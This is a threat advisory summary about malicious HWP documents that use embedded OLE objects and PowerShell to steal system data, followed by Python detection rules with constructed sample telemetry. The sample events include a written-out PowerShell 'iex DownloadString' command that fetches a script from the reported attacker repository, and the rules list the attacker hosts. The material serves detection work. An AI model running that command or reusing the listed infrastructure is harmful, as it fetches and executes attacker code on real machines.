Warning Against HWP Documents Embedded with Malicious OLE Objects
2023-11-01 • AhnLab
AhnLab identified malicious HWP documents embedded with OLE objects and aimed at people in sectors including national defense, unification, education, and the press. One document type triggered external URLs through oversized embedded OLE objects, while another created batch and text files in the temporary folder and used PowerShell to fetch scripts from GitHub. The scripts collected recent-file lists, network configuration, and running processes, stored the results under the user's AppData path, and uploaded them to an attacker-controlled FTP server. Persistence was maintained by creating an LNK file in the Startup folder that re-executed a PowerShell command to retrieve the GitHub-hosted script after reboot. The infrastructure cited includes host.sharingdocument[.]one, mail.smartprivacyc[.]com, raw.githubusercontent[.]com/babaramam/repo, and plm.myartsonline[.]com.
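The behaviour chain above, turned into detection rules over process- and file-creation telemetry, as an added example that is not part of the AhnLab report. The hosts are the ones the advisory lists; the event field layout, the HWP viewer image name `Hwp.exe`, and the sample events are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass

@dataclass
class Event:
    kind: str                 # "process" (creation) or "file" (creation)
    image: str = ""           # image path of the new process
    parent_image: str = ""    # image path of the parent process
    parent_cmdline: str = ""  # command line of the parent process
    cmdline: str = ""         # command line of the new process
    path: str = ""            # path of the created file

# Hosts named in the advisory (defanged there, dotted here so they match command lines).
REPORTED_HOSTS = ("host.sharingdocument.one", "mail.smartprivacyc.com",
                  "raw.githubusercontent.com/babaramam", "plm.myartsonline.com")
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)
TEMP_BAT_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\\s]+\.bat", re.I)      # batch file in %TEMP%
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)  # Startup-folder LNK
DOC_VIEWERS = ("hwp.exe",)  # assumed image name of the HWP viewer

def _is_ps(image):
    return image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))

def analyze(events):
    # Return one finding per suspicious behaviour, in event order.
    findings = []
    for ev in events:
        if ev.kind == "process":
            parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
            if parent in DOC_VIEWERS and (_is_ps(ev.image) or ev.image.lower().endswith("\\cmd.exe")):
                findings.append(f"document viewer spawned shell: {ev.image}")
            if _is_ps(ev.image):
                cmd = ev.cmdline.lower()
                if DOWNLOAD_RE.search(cmd) and any(h in cmd for h in REPORTED_HOSTS):
                    findings.append("powershell fetches remote script from reported host")
                if TEMP_BAT_RE.search(ev.parent_cmdline):
                    findings.append("powershell launched by batch file in %TEMP%")
        elif ev.kind == "file" and STARTUP_LNK_RE.search(ev.path):
            findings.append(f"startup persistence artifact: {ev.path}")
    return findings

# Constructed sample telemetry modelled on the reported chain (not real capture data).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
BAT = r"cmd.exe /c C:\Users\u\AppData\Local\Temp\run.bat"
SAMPLE = [
    Event("process", image=r"C:\Windows\System32\cmd.exe", parent_image=r"C:\Hnc\Hwp.exe", cmdline=BAT),
    Event("process", image=PS, parent_image=r"C:\Windows\System32\cmd.exe", parent_cmdline=BAT,
          cmdline="powershell -c \"iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/babaramam/repo/x.txt')\""),
    Event("file", path=r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"),
    Event("process", image=PS, parent_image=r"C:\Windows\explorer.exe", cmdline="powershell Get-Process"),  # benign
]
```

Running `analyze(SAMPLE)` yields four findings for the first three events and none for the benign PowerShell launch; in production the same rules would be fed from Sysmon or EDR process and file events.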